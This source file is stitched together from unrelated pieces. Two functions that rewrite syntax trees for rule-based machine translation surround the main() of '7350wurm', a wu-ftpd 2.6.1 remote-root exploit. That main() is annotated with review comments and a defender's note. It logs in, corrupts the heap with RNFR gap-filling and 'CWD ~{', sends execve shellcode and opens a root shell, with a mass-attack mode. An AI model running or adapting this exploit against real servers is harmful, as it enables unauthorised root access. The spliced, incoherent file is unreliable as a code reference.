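/**
 * Applies one lexical translation rule to the tree.
 *
 * `list` holds two strings: list[0] is the source word sequence to look for
 * among the leaves (matched against `label`, one word per leaf), list[1] the
 * target word sequence that replaces it. Only the leftmost occurrence is
 * rewritten: the deepest non-terminal whose span covers the matched leaves
 * loses every child lying inside that span and gets a single terminal child
 * (label "#") whose `trans` is the target words joined by single spaces.
 *
 * Changes against the previous version:
 *  - the search bound is now inclusive (`<=`); the old `<` skipped a match
 *    that ended on the last leaf;
 *  - the new terminal's `parent` is set, as ApplyTransRule already does;
 *  - a rule with fewer than two parts or an empty source side is a no-op
 *    instead of matching the empty sequence at position 0;
 *  - the unreachable debug traversal after `return true` and the
 *    commented-out old descent are gone.
 *
 * Always returns true (a rule that does not match is not an error).
 */
bool CTransTree::ApplyTransLexical( CUStringListRO &list )
{
    if( list.GetSize() < 2 )
        return true;

    CUString src_trans_rule = list.GetAt(0);
    CUString tgt_trans_rule = list.GetAt(1);
    CUStringListRO src_list( src_trans_rule, " " );
    CUStringListRO tgt_list( tgt_trans_rule, " " );

    const int src_len  = src_list.GetSize();
    const int leaf_cnt = (int)leaf_node_vec.size();
    if( src_len <= 0 || src_len > leaf_cnt )
        return true;

    // Leftmost match wins. The last admissible start position is
    // leaf_cnt - src_len (inclusive), so i+j never exceeds leaf_cnt-1.
    int start_idx = -1;
    int end_idx   = -1;
    for( int i=0; i<=leaf_cnt-src_len; i++ ) {
        bool match = true;
        for( int j=0; j<src_len; j++ ) {
            if( leaf_node_vec[i+j]->label != src_list.GetAt(j) ) {
                match = false;
                break;
            }
        }
        if( match ) {
            start_idx = i;
            end_idx   = i+src_len-1;
            break;
        }
    }
    if( start_idx == -1 )
        return true;

    // Descend from the root to the deepest non-terminal whose
    // [span_begin, span_end] still covers [start_idx, end_idx].
    CTransTreeNode *target_node = root;
    while( true ) {
        CTransTreeNode *narrower = NULL;
        for( int i=0; i<(int)target_node->child_vec.size(); i++ ) {
            CTransTreeNode* child_node = target_node->child_vec[i];
            if( child_node->is_terminal )
                continue;
            if( child_node->span_begin <= start_idx && child_node->span_end >= end_idx ) {
                narrower = child_node;
                break;
            }
        }
        if( narrower == NULL )
            break;
        target_node = narrower;
    }

    // Drop every child (terminal or not) that lies inside the matched span.
    // Walk backwards because RemoveChild shrinks child_vec.
    for( int i=(int)target_node->child_vec.size()-1; i>=0; i-- ) {
        CTransTreeNode* child = target_node->child_vec[i];
        if( child->span_begin >= start_idx && child->span_end <= end_idx )
            target_node->RemoveChild( child );
    }

    // One terminal carries the whole target side; AddChild takes it over
    // (ownership convention of the existing code, unchanged here).
    CTransTreeNode* new_child = new CTransTreeNode();
    new_child->label       = "#";
    new_child->is_terminal = true;
    new_child->span_begin  = start_idx;
    new_child->span_end    = end_idx;
    new_child->parent      = target_node;   // same as ApplyTransRule; harmless if AddChild sets it too
    for( int j=0; j<tgt_list.GetSize(); j++ ) {
        if( j > 0 )
            new_child->trans += " ";
        new_child->trans += tgt_list.GetAt(j);
    }
    target_node->AddChild( new_child );

    return true;
}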
/*
 * Program entry point of the 7350wurm tool whose banner is printed below.
 *
 * Control flow, as far as this function shows it:
 *   1. parse options (getopt string "hvaDmt:u:p:d:L:A:") into file-scope
 *      globals: automode, debugmode, verbose, mass, username, password,
 *      dest, user_retloc, user_retaddr, tgt_num;
 *   2. choose a target record: `tmanual` when both offsets were given,
 *      otherwise an entry of `targets[]`, or (with -a) one derived from the
 *      server banner by tgt_frombanner();
 *   3. ftp_login() to `dest`, then the stages the code labels itself
 *      ("1. filling memory gaps", exploit(), "3. triggering
 *      free(globlist[1])"), and finally either the mass-mode argv code or
 *      the interactive shell() loop.
 *
 * Defender's note: the fixed strings this function writes to the server
 * ("CWD ~{\n", INIT_CMD) and the "sP" marker it waits for in the reply are
 * stable, network-observable artifacts of this tool; the preceding
 * RNFR-based gap filling (xp_gapfill, RNFR_NUM/RNFR_SIZE) is another one.
 *
 * Everything it calls (usage, tgt_list, sc_build_x86_lnx, ftp_login,
 * tgt_frombanner, hexdump, xp_gapfill, exploit, net_write, ftp_recv_until,
 * shell) and every global it touches is defined elsewhere in the file.
 * Never returns normally: every path ends in exit().
 */
int main (int argc, char *argv[])
{
    char            c;
    char *          progname;   /* = argv[0] */
    int             fd;
    tgt_type *      tgt = NULL;
    int             tgt_num = -1;
    unsigned char   xpbuf[512 + 16];

    fprintf (stderr, "7350wurm - x86/linux wuftpd <= 2.6.1 remote root "
        "(version "VERSION")\n"
        "team teso (thx bnuts, tomas, synnergy.net !).\n\n");

    progname = argv[0];
    if (argc < 2)
        usage (progname);

    /* NOTE(review): getopt() returns int; storing it in a `char` and comparing
     * with EOF only terminates where `char` is signed. `usage()` is presumably
     * non-returning (the `case 'h'` relies on it) -- confirm. */
    while ((c = getopt (argc, argv, "hvaDmt:u:p:d:L:A:")) != EOF) {
        switch (c) {
        case 'h':
            usage (progname);
            break;
        case 'a':
            automode = 1;
            break;
        case 'D':
            debugmode = 1;
            break;
        case 'v':
            verbose += 1;
            break;
        case 'm':
            mass = 1;
            break;
        case 't':
            /* "%u" into an int: works in practice, but the conversion
             * specifier does not match the variable's type. */
            if (sscanf (optarg, "%u", &tgt_num) != 1)
                usage (progname);
            break;
        case 'u':
            /* the page carries a redacted literal here; optarg is only echoed */
            username = "******";
            printf ("username = %s\n", optarg);
            break;
        case 'p':
            password = optarg;
            break;
        case 'd':
            dest = optarg;
            break;
        case 'L':
            if (sscanf (optarg, "0x%lx", &user_retloc) != 1)
                usage (progname);
            break;
        case 'A':
            if (sscanf (optarg, "0x%lx", &user_retaddr) != 1)
                usage (progname);
            break;
        default:
            usage (progname);
            break;
        }
    }

    /* if both required offsets are given manually, then we dont have
     * to require a target selection. otherwise check whether the target
     * is within the list. if its not, then print a list of available
     * targets */
    if (user_retloc != 0 && user_retaddr != 0) {
        tgt = &tmanual;
    } else if (automode == 0 && (tgt_num == 0 ||
        tgt_num >= (sizeof (targets) / sizeof (tgt_type))))
    {
        /* `tgt_num` is signed and the right-hand side is size_t, so the
         * default -1 is converted to a huge unsigned value and lands here
         * (lists the targets); the code relies on that rather than testing
         * for -1 explicitly. */
        if (tgt_num != 0)
            printf ("WARNING: target out of list. list:\n\n");
        tgt_list ();
        exit (EXIT_SUCCESS);
    }

    if (tgt == NULL && automode == 0)
        tgt = &targets[tgt_num - 1];

    /* mass mode: the remaining argv words become an execve argument block
     * built by sc_build_x86_lnx(); its length is carried in one byte, hence
     * the 0xff limit. */
    if (mass == 1) {
        if ((argc - optind) == 0)
            usage (progname);
        mlen = sc_build_x86_lnx (mcode, sizeof (mcode), x86_lnx_execve, &argv[optind]);
        if (mlen >= 0xff) {
            fprintf (stderr, "created argv-code too long "
                "(%d bytes)\n", mlen);
            exit (EXIT_FAILURE);
        }
        fprintf (stderr, "# created %d byte execve shellcode\n", mlen);
    }

    printf ("# trying to log into %s with (%s/%s) ...", dest, username, password);
    fflush (stdout);

    /* ftp_login() is assumed to return the connected socket, or <= 0 on
     * failure -- only that contract is used here. */
    fd = ftp_login (dest, username, password);
    if (fd <= 0) {
        fprintf (stderr, "\nfailed to connect (user/pass correct?)\n");
        exit (EXIT_FAILURE);
    }
    printf (" connected.\n");

    if (debugmode) {
        printf ("DEBUG: press enter\n");
        getchar ();
    }

    /* ftp_banner is a global presumably filled by ftp_login() -- confirm */
    printf ("# banner: %s", (ftp_banner == NULL) ? "???" : ftp_banner);

    if (tgt == NULL && automode) {
        tgt = tgt_frombanner (ftp_banner);
        if (tgt == NULL) {
            printf ("# failed to jield target from banner, aborting\n");
            exit (EXIT_FAILURE);
        }
        printf ("# successfully selected target from banner\n");
    }

    /* a payload set earlier (elsewhere) wins over the target's default */
    if (shellcode == NULL) {
        shellcode = tgt->shellcode;
        shellcode_len = tgt->shellcode_len;
    }

    if (verbose >= 2) {
        printf ("using %lu byte shellcode:\n", shellcode_len);
        hexdump ("shellcode", shellcode, shellcode_len);
    }

    /* only retloc is copied into the target record here; retaddr is merely
     * reported and must be consumed elsewhere, if at all -- confirm */
    if (user_retaddr != 0) {
        fprintf (stderr, "# overriding target retaddr with: 0x%08lx\n",
            user_retaddr);
    }
    if (user_retloc != 0) {
        fprintf (stderr, "# overriding target retloc with: 0x%08lx\n",
            user_retloc);
        tgt->retloc = user_retloc;
    }

    printf ("\n### TARGET: %s\n\n", tgt->desc);

    /* real stuff starts from here */
    /* step "2." is not printed here; presumably exploit() logs it itself */
    printf ("# 1. filling memory gaps\n");
    xp_gapfill (fd, RNFR_NUM, RNFR_SIZE);
    exploit (fd, tgt);

    printf ("# 3. triggering free(globlist[1])\n");
    net_write (fd, "CWD ~{\n");

    /* success is detected by the literal "sP" at the start of the reply;
     * `xpbuf` is `unsigned char`, so this strncmp() is a pointer-sign
     * mismatch in C (and would not compile as C++). */
    ftp_recv_until (fd, xpbuf, sizeof (xpbuf), "sP");
    if (strncmp (xpbuf, "sP", 2) != 0) {
        fprintf (stderr, "exploitation FAILED !\noutput:\n%s\n", xpbuf);
        exit (EXIT_FAILURE);
    }
    printf ("#\n# exploitation succeeded. sending real shellcode\n");

    if (mass == 1) {
        printf ("# mass mode, sending constructed argv code\n");
        write (fd, mcode, mlen);
        printf ("# send. sleeping 10 seconds\n");
        sleep (10);
        printf ("# success.\n");
        exit (EXIT_SUCCESS);
    }

    printf ("# sending setreuid/chroot/execve shellcode\n");
    net_write (fd, "%s", x86_lnx_shell);

    printf ("# spawning shell\n");
    printf ("##################################################"
        "##########################\n");
    write (fd, INIT_CMD, strlen (INIT_CMD));
    shell (fd);

    exit (EXIT_SUCCESS);
}
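/**
 * Parses a target-side non-terminal reference of the form "@N" (N >= 1).
 *
 * @param s  NUL-terminated token from the rule's target side.
 * @return N, or 0 when `s` is not "@" followed by one or more digits.
 */
static int ParseNonterminalRef( const char* s )
{
    if( s == NULL || s[0] != '@' || s[1] == '\0' )
        return 0;
    int n = 0;
    for( const char* p = s+1; *p != '\0'; p++ ) {
        if( *p < '0' || *p > '9' )
            return 0;
        n = n*10 + (*p - '0');
    }
    return n;
}

/**
 * Applies one structural translation rule to every node of the tree.
 *
 * `list` holds two strings: list[0] is the source side, one token per child
 * (each compared against the child's `label`), list[1] the target side.
 * A node matches when it has exactly as many children as source tokens and
 * every child's label equals the corresponding token. On a match:
 *  - all terminal children are removed;
 *  - each target token containing exactly one "/" becomes a new terminal
 *    child (label "#", `trans` = the token, `trans_order` = its position);
 *  - each target token "@N" assigns `trans_order` = its position to the
 *    node's N-th non-terminal (GetNthNonterminal); a missing N-th
 *    non-terminal is silently skipped, as before.
 * Any other target token is ignored.
 *
 * Changes against the previous version: the "lexical" and "label" branches
 * of the source comparison were identical and are merged; "@N" is accepted
 * for any N instead of only "@1"/"@2" (backward-compatible); the children
 * count is compared as int to avoid a signed/unsigned comparison; a list
 * with fewer than two parts is a no-op.
 *
 * Always returns true.
 */
bool CTransTree::ApplyTransRule( CUStringListRO &list )
{
    if( list.GetSize() < 2 )
        return true;

    CUString src_trans_rule = list.GetAt(0);
    CUString tgt_trans_rule = list.GetAt(1);
    CUStringListRO src_list( src_trans_rule, " " );
    CUStringListRO tgt_list( tgt_trans_rule, " " );
    const int src_len = src_list.GetSize();
    const int tgt_len = tgt_list.GetSize();

    // Pre-order walk with an explicit stack. Children are pushed after a
    // node has been rewritten, so freshly added terminals are visited too
    // (they have no children of their own).
    vector<CTransTreeNode*> node_stack;
    node_stack.push_back( root );
    while( !node_stack.empty() ) {
        CTransTreeNode* node = node_stack.back();
        node_stack.pop_back();

        if( (int)node->child_vec.size() == src_len ) {
            bool match = true;
            for( int a=0; a<src_len; a++ ) {
                if( node->child_vec[a]->label != src_list.GetAt(a) ) {
                    match = false;
                    break;
                }
            }

            if( match ) {
                // Drop the source-side terminals; walk backwards because
                // RemoveChild shrinks child_vec.
                for( int i=(int)node->child_vec.size()-1; i>=0; i-- ) {
                    if( node->child_vec[i]->is_terminal )
                        node->RemoveChild( node->child_vec[i] );
                }

                // Emit target-side terminals and record the output position
                // of every referenced non-terminal.
                for( int i=0; i<tgt_len; i++ ) {
                    CUString tmp_str = tgt_list.GetAt(i);

                    if( tmp_str.Count("/") == 1 ) {
                        CTransTreeNode* new_node = new CTransTreeNode();
                        new_node->label       = "#";
                        new_node->is_terminal = true;
                        new_node->trans       = tmp_str;
                        new_node->parent      = node;
                        new_node->trans_order = i;
                        node->AddChild( new_node );
                        continue;
                    }

                    const int nth = ParseNonterminalRef( tmp_str.GetStr() );
                    if( nth <= 0 )
                        continue;   // not a "@N" reference: ignored, as before
                    CTransTreeNode* tmp_node = node->GetNthNonterminal( nth );
                    if( tmp_node != NULL )
                        tmp_node->trans_order = i;
                    // NULL: the rule names more non-terminals than the node has.
                }
            }
        }

        for( int i=0; i<(int)node->child_vec.size(); i++ )
            node_stack.push_back( node->child_vec[i] );
    }

    return true;
}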